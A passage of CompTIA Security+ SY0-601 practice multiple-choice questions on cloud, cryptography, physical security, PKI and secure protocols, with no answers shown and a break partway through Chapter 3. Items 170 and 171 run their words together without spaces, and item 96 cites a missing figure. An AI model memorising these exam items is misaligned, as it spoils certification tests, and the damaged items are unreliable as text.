C. A tool that sits between cloud application providers and customers to enforce web application security policies

D. A system that implements discretionary access control on cloud infrastructure

75. Derek has been asked to implement his organization's service-oriented architecture as a set of microservices. What does he need to implement?

A. A set of loosely coupled services with specific purposes

B. A set of services that run on very small systems

C. A set of tightly coupled services with custom-designed protocols to ensure continuous operation

D. A set of services using third-party applications in a connected network enabled with industry standard protocols

76. Abigail is responsible for datacenters in a large, multinational company. She has to support multiple datacenters in diverse geographic regions. What would be the most effective way for her to manage these centers consistently across the enterprise?

A. Hire datacenter managers for each center.

B. Implement enterprise-wide SDN.

C. Implement infrastructure as code (IaC).

D. Automate provisioning and deprovisioning.

77. Elizabeth wants to implement a cloud-based authorization system. Which of the following protocols is she most likely to use for that purpose?

A. OpenID

B. Kerberos

C. SAML

D. OAuth

78. Greg is assessing an organization and finds that they have numerous multifunction printers (MFPs) that are accessible from the public Internet. What is the most critical security issue he should identify?

A. Third parties could print to the printers, using up the supplies.

B. The printers could be used as part of a DDoS attack.

C. The printers may allow attackers to access other parts of the company network.

D. The scanners may be accessed to allow attackers to scan documents that are left in them.

79. Keith has deployed computers to users in his company that load their resources from a central server environment rather than from their own hard drives. What term describes this model?

A. Thick clients

B. Client-as-a-server

C. Cloud desktops

D. Thin clients

80. Henry notices that a malware sample he is analyzing downloads a file from imgur.com and then executes an attack using Mimikatz, a powerful Windows password account theft tool. When he analyzes the image, he cannot identify any recognizable code. What technique has most likely been used in this scenario?

A. The image is used as a decryption key.

B. The code is hidden in the image using steganography.

C. The code is encoded as text in the image.

D. The image is a control command from a malware command and control network.

81. Molly wants to advise her organization's developers on secure coding techniques to avoid data exposure. Which of the following is not a common technique used to prevent sensitive data exposure?

A. Store data in plain text.

B. Require HTTPS for all authenticated pages.

C. Ensure tokens are not disclosed in public source code.

D. Hash passwords using a salt.

82. Naomi wants to secure a real-time operating system (RTOS). Which of the following techniques is best suited to providing RTOS security?

A. Disable the web browser.

B. Install a host firewall.

C. Use secure firmware.

D. Install antimalware software.

83. John is examining the logs for his company's web applications. He discovers what he believes is a breach. After further investigation, it appears as if the attacker executed code from one of the libraries the application uses, code that is no longer even used by the application. What best describes this attack?

A. Buffer overflow

B. Code reuse attack

C. DoS attack

D. Session hijacking

84. Chris is designing an embedded system that needs to provide low-power, peer-to-peer communications. Which of the following technologies is best suited to this purpose?

A. Baseband radio

B. Narrowband radio

C. Zigbee

D. Cellular

85. What term is used to describe encryption that can permit computations to be conducted on ciphertext, with the results matching what would have occurred if the same computations were performed on the original plaintext?

A. Identity-preserving encryption

B. Homomorphic encryption

C. Replicable encryption

D. None of the above

86. Tony wants to implement a biometric system for entry access in his organization. Which of the following systems is likely to be most accepted by members of his organization's staff?

A. Fingerprint

B. Retina

C. Iris

D. Voice

87. Nathan wants to implement off-site cold backups. What backup technology is most commonly used for this type of need?

A. SAN

B. Disk

C. Tape

D. NAS

88. Allan is considering implementing off-site storage. When he does, his datacenter manager offers four solutions. Which of these solutions will best ensure resilience and why?

A. Back up to a second datacenter in another building nearby, allowing reduced latency for backups.

B. Back up to an off-site location at least 90 miles away to ensure that a natural disaster does not destroy both copies.

C. Back up to a second datacenter in another building nearby to ensure that the data will be accessible if the power fails to the primary building.

D. Back up to an off-site location at least 10 miles away to balance latency and resilience due to natural disaster.

89. Ben has been asked to explain the security implications for an embedded system that his organization is considering building and selling. Which of the following is not a typical concern for embedded systems?

A. Limited processor power

B. An inability to patch

C. Lack of authentication capabilities

D. Lack of bulk storage

90. You are concerned about the security of new devices your company has implemented. Some of these devices use SoC technology. What would be the best security measure you could take for these?

A. Using a TPM

B. Ensuring each has its own cryptographic key

C. Using SED

D. Using BIOS protection

91. Vincent works for a company that manufactures portable medical devices, such as insulin pumps. He is concerned about ensuring these devices are secure. Which of the following is the most important step for him to take?

A. Ensure all communications with the device are encrypted.

B. Ensure the devices have FDE.

C. Ensure the devices have individual antimalware.

D. Ensure the devices have been fuzz-tested.

92. Emile is concerned about securing the computer systems in vehicles. Which of the following vehicle types has significant cybersecurity vulnerabilities?

A. UAV

B. Automobiles

C. Airplanes

D. All of the above

93. What additional security control can Amanda implement if she uses compiled software that she cannot use if she only has software binaries?

A. She can review the source code.

B. She can test the application in a live environment.

C. She can check the checksums provided by the vendor.

D. None of the above

94. Greta wants to understand how a protocol works, including what values should be included in packets that use that protocol. Where is this data definitively defined and documented?

A. An RFC

B. Wikipedia

C. The Internet Archive

D. None of the above

95. Using standard naming conventions provides a number of advantages. Which of the following is not an advantage of using a naming convention?

A. It can help administrators determine the function of a system.

B. It can help administrators identify misconfigured or rogue systems.

C. It can help conceal systems from attackers.

D. It can make scripting easier.

96. What process is shown in the following figure?

A. A continuous monitoring environment

B. A CI/CD pipeline

C. A static code analysis system

D. A malware analysis process

97. Keith wants to identify a subject from camera footage from a train station. What biometric technology is best suited to this type of identification?

A. Vein analysis

B. Voiceprint analysis

C. Fingerprint analysis

D. Gait analysis

98. Your company is interested in keeping data in the cloud. Management feels that public clouds are not secure but is concerned about the cost of a private cloud. What is the solution you would recommend?

A. Tell them there are no risks with public clouds.

B. Tell them they will have to find a way to budget for a private cloud.

C. Suggest that they consider a community cloud.

D. Recommend against a cloud solution at this time.

99. Your development team primarily uses Windows, but they need to develop a specific solution that will run on Linux. What is the best solution to get your programmers access to Linux systems for development and testing if you want to use a cloud solution where you could run the final systems in production as well?

A. Set their machines to dual-boot Windows and Linux.

B. Use PaaS.

C. Set up a few Linux machines for them to work with as needed.

D. Use IaaS.

100. Corrine has been asked to automate security responses, including blocking IP addresses from which attacks are detected using a series of scripts. What critical danger should she consider while building the scripts for her organization?

A. The scripts could cause an outage.

B. The scripts may not respond promptly to private IP addresses.

C. Attackers could use the scripts to attack the organization.

D. Auditors may not allow the scripts.

101. Madhuri has configured a backup that will back up all of the changes to a system since the last time that a full backup occurred. What type of backup has she set up?

A. A snapshot

B. A full backup

C. An incremental backup

D. A differential

102. You are the CIO for a small company. The company wants to use cloud storage for some of its data, but cost is a major concern. Which of the following cloud deployment models would be best?

A. Community cloud

B. Private cloud

C. Public cloud

D. Hybrid cloud

103. What is the point where false acceptance rate and false rejection rate cross over in a biometric system?

A. CRE

B. FRE

C. CER

D. FRR

104. Devin is building a cloud system and wants to ensure that it can adapt to changes in its workload by provisioning or deprovisioning resources automatically. His goal is to ensure that the environment is not overprovisioned or underprovisioned and that he is efficiently spending money on his infrastructure. What concept describes this?

A. Vertical scalability

B. Elasticity

C. Horizontal scalability

D. Normalization

105. Nathaniel wants to improve the fault tolerance of a server in his datacenter. If he wants to ensure that a power outage does not cause the server to lose power, what is the first control he should deploy from the following list?

A. A UPS

B. A generator

C. Dual power supplies

D. Managed power units (PDUs)

106. Which of the following is the best description for VM sprawl?

A. When VMs on your network outnumber physical machines

B. When there are more VMs than IT can effectively manage

C. When a VM on a computer begins to consume too many resources

D. When VMs are spread across a wide area network

107. Which of the following is the best description of a stored procedure?

A. Code that is in a DLL, rather than the executable

B. Server-side code that is called from a client

C. SQL statements compiled on the database server as a single procedure that can be called

D. Procedures that are kept on a separate server from the calling application, such as in middleware

108. Farès is responsible for security at his company. He has had bollards installed around the front of the building. What is Farès trying to accomplish?

A. Gated access for people entering the building

B. Video monitoring around the building

C. Protecting against EMI

D. Preventing a vehicle from being driven into the building

109. The large company that Selah works at uses badges with a magnetic stripe for entry access. Which threat model should Selah be concerned about with badges like these?

A. Cloning of badges

B. Tailgating

C. Use by unauthorized individuals

D. All of the above

110. You are concerned about VM escape attacks causing a significant data breach. Which of the following would provide the most protection against this?

A. Separate VM hosts by data type or sensitivity.

B. Install a host-based antivirus on both the VM and the host.

C. Implement FDE on both the VM and the host.

D. Use a TPM on the host.

111. Teresa is the network administrator for a small company. The company is interested in a robust and modern network defense strategy but lacks the staff to support it. What would be the best solution for Teresa to use?

A. Implement SDN.

B. Use automated security.

C. Use an MSSP.

D. Implement only the few security controls they have the skills to implement.

112. Dennis is trying to set up a system to analyze the integrity of applications on his network. He wants to make sure that the applications have not been tampered with or Trojaned. What would be most useful in accomplishing this goal?

A. Implement NIPS.

B. Use cryptographic hashes.

C. Sandbox the applications in question.

D. Implement NIDS.

113. George is a network administrator at a power plant. He notices that several turbines had unusual ramp-ups in cycles last week. After investigating, he finds that an executable was uploaded to the system control console and caused this. Which of the following would be most effective in preventing this from affecting the SCADA system in the future?

A. Implement SDN.

B. Improve patch management.

C. Place the SCADA system on a separate VLAN.

D. Implement encrypted data transmissions.

114. Gordon knows that regression testing is important but wants to prevent old versions of code from being re-inserted into new releases. What process should he use to prevent this?

A. Continuous integration

B. Version numbering

C. Continuous deployment

D. Release management

115. Mia is a network administrator for a bank. She is responsible for secure communications with her company's customer website. Which of the following would be the best for her to implement?

A. SSL

B. PPTP

C. IPSec

D. TLS

116. Which of the following is not a common challenge with smart card-based authentication systems?

A. Weak security due to the limitations of the smart card's encryption support

B. Added expense due to card readers, distribution, and software installation

C. Weaker user experience due to the requirement to insert the card for every authentication

D. Lack of security due to possession of the card being the only factor used

117. Susan's secure building is equipped with alarms that go off if specific doors are opened. As part of a penetration test, Susan wants to determine if the alarms are effective. What technique is used by penetration testers to make alarms less effective?

A. Setting off the alarms as part of a preannounced test

B. Disabling the alarms and then opening doors to see if staff report the opened doors

C. Asking staff members to open the doors to see if they will set the alarm off

D. Setting off the alarms repeatedly so that staff become used to hearing them go off

118. What term is used to describe the general concept of “anything as a service”?

A. AaaS

B. ATaaS

C. XaaS

D. ZaaS

119. What role does signage play in building security?

A. It is a preventive control warning unauthorized individuals away from secured areas.

B. It can help with safety by warning about dangerous areas, materials, or equipment.

C. It can provide directions for evacuation and general navigation.

D. All of the above

120. Nora has rented a building with access to bandwidth and power in case her organization ever experiences a disaster. What type of site has she established?

A. A hot site

B. A cold site

C. A warm site

D. A MOU site

121. Matt is patching a Windows system and wants to have the ability to revert to a last known good configuration. What should he set?

A. A system restore point

B. A reversion marker

C. A nonpersistent patch point

D. A live boot marker

122. Which multifactor authentication can suffer from problems if the system or device's time is not correct?

A. TOTP

B. SMS

C. HOTP

D. MMAC

123. The company that Nina works for has suffered from recent thefts of packages from a low-security delivery area. What type of camera capability can they use to ensure that a recently delivered package is properly monitored?

A. Infrared image capture

B. Motion detection

C. Object detection

D. Facial recognition

124. Which of the following is not a common organizational security concern for wearable devices?

A. GPS location data exposure

B. Data exposure

C. User health data exposure

D. Insecure wireless connectivity

125. Tim is building a Faraday cage around his server room. What is the primary purpose of a Faraday cage?

A. To regulate temperature

B. To regulate current

C. To block intrusions

D. To block EMI

126. You are working for a large company. You are trying to find a solution that will provide controlled physical access to the building and record every employee who enters the building. Which of the following would be the best for you to implement?

A. A security guard with a sign-in sheet

B. Smart card access using electronic locks

C. A camera by the entrance

D. A sign-in sheet by the front door

127. What concern causes organizations to choose physical locks over electronic locks?

A. They provide greater security.

B. They are resistant to bypass attempts.

C. They are harder to pick.

D. They do not require power.

128. Kara has been asked to include IP schema management as part of her configuration management efforts. Which of the following is a security advantage of IP schema configuration management?

A. Detecting rogue devices

B. Using IP addresses to secure encryption keys

C. Preventing denial-of-service attacks

D. Avoiding IP address exhaustion

129. Carole is concerned about security for her server room. She wants the most secure lock she can find for the server room door. Which of the following would be the best choice for her?

A. Combination lock

B. Key-in-knob

C. Deadbolt

D. Padlock

130. Melissa wants to implement NIC teaming for a server in her datacenter. What two major capabilities will this provide for her?

A. Lower latency and greater throughput

B. Greater throughput and fault tolerance

C. Higher latency and fault tolerance

D. Fault tolerance and lower latency

131. Molly is implementing biometrics in her company. Which of the following should be her biggest concern?

A. FAR

B. FRR

C. CER

D. EER

132. Mike is concerned about data sovereignty for data that his organization captures and maintains. What best describes his concern?

A. Who owns the data that is captured on systems hosted in a cloud provider's infrastructure?

B. Can Mike's organization make decisions about data that is part of its service, or does it belong to users?

C. Is the data located in a country subject to the laws of the country where it is stored?

D. Does data have rights on its own, or does the owner of the data determine what rights may apply to it?

133. What are the key limiting factors for cryptography on low-power devices?

A. There are system limitations on memory, CPU, and storage.

B. The devices cannot support public key encryption due to an inability to factor prime numbers.

C. There is a lack of chipset support for encryption.

D. Legal limitations for low-power devices prevent encryption from being supported.

134. Fred is responsible for physical security in his company. He wants to find a good way to protect the USB thumb drives that have BitLocker keys stored on them. Which of the following would be the best solution for this situation?

A. Store the drives in a secure cabinet or safe.

B. Encrypt the thumb drives.

C. Don't store BitLocker keys on these drives.

D. Lock the thumb drives in desk drawers.

135. Juanita is responsible for servers in her company. She is looking for a fault-tolerant solution that can handle two drives failing. Which of the following should she select?

A. RAID 3

B. RAID 0

C. RAID 5

D. RAID 6

136. Maria's organization uses a CCTV monitoring system in their main office building, which is occupied and in use 24-7. The system uses cameras connected to displays to provide real-time monitoring. What additional feature is the most likely to receive requests to ensure that her organization can effectively use the CCTV system to respond to theft and other issues?

A. Motion activation

B. Infrared cameras

C. DVR

D. Facial recognition

137. What is the primary threat model against static codes used for multifactor authentication?

A. Brute force

B. Collisions

C. Theft

D. Clock mismatch

138. Dennis needs a cryptographic algorithm that provides low latency. What type of cryptosystem is most likely to meet this performance requirement?

A. Hashing

B. Symmetric encryption

C. Asymmetric encryption

D. Electronic one-time pad

139. The company that Devin works for has selected a nondescript building and does not use exterior signage to advertise that the facility belongs to them. What physical security term describes this type of security control?

A. Industrial camouflage

B. Demilitarized zone

C. Industrial obfuscation

D. Disruptive coloration

140. Ed knows that TLS sessions start using asymmetric encryption, and then move to use symmetric keys. What limitation of asymmetric cryptography drives this design decision?

A. Speed and computational overhead

B. Key length limitations

C. Lifespan (time) to brute force it

D. Key reuse for asymmetric algorithms

141. When you are concerned about application security, what is the most important issue in memory management?

A. Never allocate a variable any larger than is needed.

B. Always check bounds on arrays.

C. Always declare a variable where you need it (i.e., at function or file level if possible).

D. Make sure you release any memory you allocate.

142. Bart wants to ensure that the file he encrypts remains secure for as long as possible. What should Bart do to maximize the longevity of his encrypted file's security?

A. Use a quantum cipher.

B. Use the longest key possible.

C. Use an anti-quantum cipher.

D. Use a rotating symmetric key.

143. Nadine's organization stores and uses sensitive information, including Social Security numbers. After a recent compromise, she has been asked to implement technology that can help prevent this sensitive data from leaving the company's systems and networks. What type of technology should Nadine implement?

A. Stateful firewalls

B. OEM

C. DLP

D. SIEM

144. What form is the data used for quantum key distribution sent in?

A. Bytes

B. Bits

C. Qubits

D. Nuquants

145. Alicia needs to ensure that a process cannot be subverted by a single employee. What security control can she implement to prevent this?

A. Biometric authentication

B. Two-person control

C. Robotic sentries

D. A DMZ

146. Social login, the ability to use an existing identity from a site like Google, Facebook, or a Microsoft account, is an example of which of the following concepts?

A. Federation

B. AAA

C. Privilege creep

D. Identity and access management

147. Michelle is traveling and wants to plug her phone into the charger in her hotel room. What security precaution can she use to ensure that her phone is not attacked by a malicious device built into the charger in her room?

A. A USB data blocker

B. A parallel USB cable

C. A data circuit breaker

D. An HOTP interrogator

148. Which cloud service model provides the consumer with the infrastructure to create applications and host them?

A. SaaS

B. PaaS

C. IaaS

D. IDaaS

149. Why is avoiding initialization vector and key reuse recommended to ensure secure encryption?

A. It makes it impossible to brute force.

B. It means a single successful attack will not expose multiple messages.

C. It means a single successful attack will not expose any messages.

D. It makes brute force easier.

150. Dan knows that his Linux system generates entropy that is used for multiple functions, including encryption. Which of the following is a source of entropy for the Linux kernel?

A. Time of day

B. User login events

C. Keystrokes and mouse movement

D. Network packet timing

151. Mike knows that computational overheads are a concern for cryptographic systems. What can he do to help limit the computational needs of his solution?

A. Use hashes instead.

B. Use short keys.

C. Use elliptic curve encryption.

D. Use the RSA algorithm.

152. What is the primary role of lighting in a physical security environment?

A. It acts as a detective control.

B. It acts as a reactive control.

C. It acts as a deterrent control.

D. It acts as a compensating control.

153. Dennis has deployed servers and storage to each of the facilities his organization runs to ensure that scientific equipment can send and receive data at the speed that it needs to function. What computational design concept describes this?

A. Hybrid cloud

B. Mist computing

C. Edge computing

D. Local cloud

154. Ben replaces sensitive data in his database with unique identifiers. The identifiers allow him to continue to take actions on the data without exposing the data itself. What type of solution has he deployed?

A. Masking

B. Encryption

C. Hashing

D. Tokenization

155. Dana wants to discourage potential malicious actors from accessing her facility. Which of the following is both a deterrent and a physical control?

A. A visitor log

B. A motion detector

C. A security camera

D. Fences

156. What additional capabilities does adding a digital signature to an encrypted message provide?

A. Integrity and nonrepudiation

B. Confidentiality and integrity

C. Availability and nonrepudiation

D. Confidentiality and availability

157. Megan has been asked to set up a periodic attestation process for accounts in her organization. What has she been asked to do?

A. Validate that the users are still employed.

B. Validate that the user's rights and permissions are still correct.

C. Require users to provide proof of identity.

D. Validate security controls as part of a test.

158. Elaine wants to adopt appropriate response and recovery controls for natural disasters. What type of control should she use to prepare for a multihour power outage caused by a tornado?

A. A hot site

B. A generator

C. A PDU

D. A UPS

159. What does a message authentication code (MAC) do when used as part of a cryptographic system?

A. It validates the message's integrity and authenticity.

B. It validates the message's confidentiality and authenticity.

C. It protects the message's confidentiality and integrity.

D. None of the above

160. Charles wants to put a fire suppression system in place in an area where highly sensitive electronics are in use. What type of fire suppression system is best suited to this type of environment if Charles is concerned about potential harm to first responders or on-site staff?

A. Pre-charge

B. Dry pipe

C. Inert gas

D. Carbon dioxide

161. What technology is typically used for proximity card readers?

A. Magnetic stripe

B. Biometrics

C. RFID

D. Infrared

162. How does asymmetric encryption support nonrepudiation?

A. Using digital signatures

B. Using longer keys

C. Using reversible hashes

D. Using the recipient's public key

163. Olivia knows that she needs to consider geography as part of her security considerations. Which of the following is a primary driver of geographical considerations for security?

A. MTR

B. Natural disasters

C. Service integration

D. Sprawl avoidance

164. Scott wants to limit the impact of potential threats from UAVs. What physical security control is best suited to this purpose?

A. Adding more fences

B. Moving sensitive areas to the interior of a building

C. Deploying biometric sensors

D. Moving sensitive areas to Faraday cages

165. Derek wants to explain the concept of resource constraints driving security constraints when using encryption. Which of the following descriptions best explains the trade-offs that he should explain to his management?

A. Stronger encryption requires more space on drives, meaning that the harder it is to break, the more storage you'll need, driving up cost.

B. Stronger encryption is faster, which means that using strong encryption will result in lower latency.

C. Stronger encryption requires more entropy. This may reduce the overall security of the system when entropy is exhausted.

D. Stronger encryption requires more computational resources, requiring a balance between speed and security.

166. Amanda wants to ensure that the message she is sending remains confidential. What should she do to ensure this?

A. Hash the messages.

B. Digitally sign the message.

C. Encrypt the message.

D. Use a quantum encryption algorithm.

167. What security advantage do cloud service providers like Amazon, Google, and Microsoft have over local staff and systems for most small to mid-sized organizations?

A. Better understanding of the organization's business practices

B. Faster response times

C. More security staff and budget

D. None of the above

168. Tim wants to ensure that his web servers can scale horizontally during traffic increases, while also allowing them to be patched or upgraded without causing outages. What type of network device should he deploy?

A. A firewall

B. A switch

C. A horizontal scaler

D. A network load balancer

169. Gabby wants to ensure that sensitive data can be transmitted in unencrypted form by using physical safeguards. What type of solution should she implement?

A. Shielded cables

B. Armored cables

C. Distribution lockdown

D. Protected cable distribution

170. MaureenconcealsinformationshewantstotransmitsurreptitiouslybymodifyinganMP3fileinawaythatdoesnotnoticeablychangehowitsounds.Whatisthistechniquecalled?

A. MP3crypt

B. Audiosteganography

C. Audiohashing

D. HoneyMP3s

171. Nicoleisassessingriskstohermultifactorauthenticationsystem.Whichofthefollowingisthemostlikelythreatmodelagainstshortmessageservice(SMS)pushnotificationstocellphonesforherenvironment?

A. AttacksonVoIPsystems

B. SIMcloning

C. Brute-forceattacks

D. Rainbowtables

172. John wants to protect data at rest so that he can process it and use it as needed in its original form. What solution from the following list is best suited to this requirement?

A. Hashing

B. TLS

C. Encryption

D. Tokenization

173. Nathaniel has deployed the control infrastructure for his manufacturing plant without a network connection to his other networks. What term describes this type of configuration?

A. DMZ

B. Air gap

C. Vaulting

D. A hot aisle

174. Naomi hides the original data in a Social Security number field to ensure that it is not exposed to users of her database. What data security technique does this describe?

A. Masking

B. Encryption

C. Hashing

D. Tokenization

175. Isaac wants to use on-premises cloud computing. What term describes this type of cloud computing solution?

A. Infrastructure as a service

B. Hybrid cloud

C. Private cloud

D. Platform as a service

176. What is the primary threat model against physical tokens used for multifactor authentication?

A. Cloning

B. Brute force

C. Theft

D. Algorithm failure

177. Maria is a security administrator for a large bank. She is concerned about malware, particularly spyware that could compromise customer data. Which of the following would be the best approach for her to mitigate the threat of spyware?

A. Computer usage policies, network antimalware, and host antimalware

B. Host antimalware and network antimalware

C. Host and network antimalware, computer usage policies, and website whitelisting

D. Host and network antimalware, computer usage policies, and employee training

178. Charles has configured his multifactor system to require both a PIN and a password. How many effective factors does he have in place once he presents both of these and his username?

A. One

B. Two

C. Three

D. Four

179. Fred adds the value 89EA443CCDA16B89 to every password as a salt. What issue might this cause?

A. The salt is too long.

B. The salt is alphanumeric.

C. The salt is reused.

D. The salt is too short.

180. Alaina needs to physically secure the root encryption keys for a certificate authority. What type of security device should she use to maintain local control and security for them?

A. A USB thumb drive

B. A vault or safe

C. An air-gapped system

D. None of the above

181. Angela wants to help her organization use APIs more securely and needs to select three API security best practices. Which of the following options is not a common API security best practice?

A. Use encryption throughout the API's request/response cycle.

B. Authorize before authenticating.

C. Do not trust input strings and validate parameters.

D. Enable auditing and logging.

182. Frank uses a powerful magnet to wipe tapes before they are removed from his organization's inventory. What type of secure data destruction technique has he used?

A. Tape burning

B. Data shredding

C. Degaussing

D. Pulping

183. Angela has been asked to deploy 5G cellular inside her organization. What concern should she raise with her management about the effort to implement it?

A. 5G requires high levels of antenna density for full coverage.

B. 5G signals should only be used in exterior deployments.

C. 5G is not widely available and cannot be deployed yet.

D. 5G signals cannot coexist with traditional Wi-Fi.

184. Chris is reviewing the rights that staff in his organization have to data stored in a group of departmental file shares. He is concerned that rights management practices have not been followed and that employees who have been with the company he works for have not had their privileges removed after they switched jobs. What type of issue has Chris encountered?

A. Privilege creep

B. IAM inflation

C. Masking issues

D. Privilege escalation

185. Isaac has been asked to set up a honeyfile. What should he configure?

A. A list of tasks to accomplish

B. A list of potentially valuable data

C. A bait file for attackers to access

D. A vulnerable Word file

186. Yasmine wants to ensure that she has met a geographic dispersal requirement for her datacenters. How far away should she place her datacenter based on common best practices for dispersal?

A. 5 miles

B. 45 miles

C. 90 miles

D. 150 miles

187. What term describes extending cloud computing to the edge of an enterprise network?

A. Local cloud

B. Fog computing

C. Managed cloud

D. Blade computing

188. Which of the following algorithms is a key stretching algorithm?

A. bcrypt

B. ncrypt

C. MD5

D. SHA1

189. Jocelyn has been asked to implement a directory service. Which of the following technologies should she deploy?

A. SAML

B. OAuth

C. LDAP

D. 802.1x

Chapter 3 Implementation

THE COMPTIA SECURITY+ EXAM SY0-601 TOPICS COVERED IN THIS CHAPTER INCLUDE THE FOLLOWING:

3.1 Given a scenario, implement secure protocols

3.2 Given a scenario, implement host or application security solutions

3.3 Given a scenario, implement secure network designs

3.4 Given a scenario, install and configure wireless security settings

3.5 Given a scenario, implement secure mobile solutions

3.6 Given a scenario, apply cybersecurity solutions to the cloud

3.7 Given a scenario, implement identity and account management controls

3.8 Given a scenario, implement authentication and authorization solutions

3.9 Given a scenario, implement public key infrastructure

1. Adam is setting up a public key infrastructure (PKI) and knows that keeping the passphrases and encryption keys used to generate new keys secure is a critical part of ensuring that the root certificate authority remains secure. Which of the following techniques is not a common solution to help prevent insider threats?

A. Require a new passphrase every time the certificate is used.

B. Use a split knowledge process for the password or key.

C. Require dual control.

D. Implement separation of duties.

2. Naomi is designing her organization's wireless network and wants to ensure that the design places access points in areas where they will provide optimum coverage. She also wants to plan for any sources of RF interference as part of her design. What should Naomi do first?

A. Contact the FCC for a wireless map.

B. Conduct a site survey.

C. Disable all existing access points.

D. Conduct a port scan to find all existing access points.

3. Chris is preparing to implement an 802.1X-enabled wireless infrastructure. He knows that he wants to use an Extensible Authentication Protocol (EAP)-based protocol that does not require client-side certificates. Which of the following options should he choose?

A. EAP-MD5

B. PEAP

C. LEAP

D. EAP-TLS

4. What term is commonly used to describe lateral traffic movement within a network?

A. Side-stepping

B. Slider traffic

C. East-west traffic

D. Peer interconnect

5. Charlene wants to use the security features built into HTTP headers. Which of the following is not an HTTP header security option?

A. Requiring transport security

B. Preventing cross-site scripting

C. Disabling SQL injection

D. Helping prevent MIME sniffing

6. Charlene wants to provision her organization's standard set of marketing information to mobile devices throughout her organization. What MDM feature is best suited to this task?

A. Application management

B. Remote wipe

C. Content management

D. Push notifications

7. Denny wants to deploy antivirus for his organization and wants to ensure that it will stop the most malware. What deployment model should Denny select?

A. Install antivirus from the same vendor on individual PCs and servers to best balance visibility, support, and security.

B. Install antivirus from more than one vendor on all PCs and servers to maximize coverage.

C. Install antivirus from one vendor on PCs and from another vendor on the server to provide a greater chance of catching malware.

D. Install antivirus only on workstations to avoid potential issues with server performance.

8. When Amanda visits her local coffee shop, she can connect to the open wireless without providing a password or logging in, but she is immediately redirected to a website that asks for her email address. Once she provides it, she is able to browse the Internet normally. What type of technology has Amanda encountered?

A. A preshared key

B. A captive portal

C. Port security

D. Wi-Fi Protected Access

9. Charles has been asked to implement DNSSEC for his organization. Which of the following does it provide?

A. Confidentiality

B. Integrity

C. Availability

D. All of the above

10. Sarah has implemented an OpenID-based authentication system that relies on existing Google accounts. What role does Google play in a federated environment like this?

A. An RP

B. An IdP

C. An SP

D. An RA

11. Ian needs to connect to a system via an encrypted channel so that he can use a command-line shell. What protocol should he use?

A. Telnet

B. HTTPS

C. SSH

D. TLS

12. Casey is considering implementing password key devices for her organization. She wants to use a broadly adopted open standard for authentication and needs her keys to support that. Which of the following standards should she look for her keys to implement, in addition to being able to connect via USB, Bluetooth, and NFC?

A. SAML

B. FIDO

C. ARF

D. OpenID

13. Nadia is concerned about the content of her emails to her friend Danielle being read as they move between servers. What technology can she use to encrypt her emails, and whose key should she use to encrypt the message?

A. S/MIME, her private key

B. Secure POP3, her public key

C. S/MIME, Danielle's public key

D. Secure POP3, Danielle's private key

14. What type of communications is SRTP most likely to be used for?

A. Email

B. VoIP

C. Web

D. File transfer

15. Olivia is implementing a load-balanced web application cluster. Her organization already has a redundant pair of load balancers, but each unit is not rated to handle the maximum designed throughput of the cluster by itself. Olivia has recommended that the load balancers be implemented in an active/active design. What concern should she raise as part of this recommendation?

A. The load balancer cluster cannot be patched without a service outage.

B. The load balancer cluster is vulnerable to a denial-of-service attack.

C. If one of the load balancers fails, it could lead to service degradation.

D. None of the above

16. What two ports are most commonly used for FTPS traffic?

A. 21, 990

B. 21, 22

C. 433, 1433

D. 20, 21

17. What occurs when a certificate is stapled?

A. Both the certificate and OCSP responder are sent together to prevent additional retrievals during certificate path validation.

B. The certificate is stored in a secured location that prevents the certificate from being easily removed or modified.

C. Both the host certificate and the root certificate authority's private key are attached to validate the authenticity of the chain.

D. The certificate is attached to other certificates to demonstrate the entire certificate chain.

18. Greg is setting up a public key infrastructure (PKI). He creates an offline root certificate authority (CA) and then needs to issue certificates to users and devices. What system or device in a PKI receives certificate signing requests (CSRs) from applications, systems, and users?

A. An intermediate CA

B. An RA

C. A CRL

D. None of the above

19. Mark is responsible for managing his company's load balancer and wants to use a load-balancing scheduling technique that will take into account the current server load and active sessions. Which of the following techniques should he choose?

A. Source IP hashing

B. Weighted response time

C. Least connection

D. Round robin

20. During a security review, Matt notices that the vendor he is working with lists their IPSec virtual private network (VPN) as using AH protocol for security of the packets that it sends. What concern should Matt note to his team about this?

A. AH does not provide confidentiality.

B. AH does not provide data integrity.

C. AH does not provide replay protection.

D. None of the above; AH provides confidentiality, authentication, and replay protection.

21. Michelle wants to secure mail being retrieved via the Post Office Protocol Version 3 (POP3) because she knows that it is unencrypted by default. What is her best option to do this while leaving POP3 running on its default port?

A. Use TLS via port 25.

B. Use IKE via port 25.

C. Use TLS via port 110.

D. Use IKE via port 110.

22. Daniel works for a mid-sized financial institution. The company has recently moved some of its data to a cloud solution. Daniel is concerned that the cloud provider may not support the same security policies as the company's internal network. What is the best way to mitigate this concern?

A. Implement a cloud access security broker.

B. Perform integration testing.

C. Establish cloud security policies.

D. Implement security as a service.

23. The company that Angela works for has deployed a Voice over IP (VoIP) environment that uses SIP. What threat is the most likely issue for their phone calls?

A. Call interception

B. Vishing

C. War dialing

D. Denial-of-service attacks

24. Alaina is concerned about the security of her NTP time synchronization service because she knows that protocols like TLS and BGP are susceptible to problems if fake NTP messages were able to cause time mismatches between systems. What tool could she use to quickly protect her NTP traffic between Linux systems?

A. An IPSec VPN

B. SSH tunneling

C. RDP

D. A TLS VPN

25. Ramon is building a new web service and is considering which parts of the service should use Transport Layer Security (TLS). Components of the application include:

1. Authentication

2. A payment form

3. User data, including address and shopping cart

4. A user comments and reviews section

Where should he implement TLS?

A. At points 1, 2, and 4

B. At points 2, 3, and 4

C. At points 1, 2, and 3

D. At all points in the infrastructure

26. Katie's organization uses File Transfer Protocol (FTP) for contractors to submit their work product to her organization. The contractors work on sensitive customer information, and then use organizational credentials provided by Katie's company to log in and transfer the information. What sensitive information could attackers gather if they were able to capture the network traffic involved in this transfer?

A. Nothing, because FTP is a secure protocol

B. IP addresses for both client and server

C. The content of the files that were uploaded

D. Usernames, passwords, and file content

27. What security benefits are provided by enabling DHCP snooping or DHCP sniffing on switches in your network?

A. Prevention of malicious or malformed DHCP traffic

B. Prevention of rogue DHCP servers

C. Collection of information about DHCP bindings

D. All of the above

28. Aaron wants to use a certificate for the following production hosts:

www.example.com

blog.example.com

news.example.com

What is the most efficient way for him to provide Transport Layer Security (TLS) for all of these systems?

A. Use self-signed certificates.

B. Use a wildcard certificate.

C. Use an EV certificate.

D. Use an SSL certificate.

29. Cassandra is concerned about attacks against her network's Spanning Tree Protocol (STP). She wants to ensure that a new switch introduced by an attacker cannot change the topology by asserting a lower bridge ID than the current configuration. What should she implement to prevent this?

A. Enable BridgeProtect.

B. Set the bridge ID to a negative number.

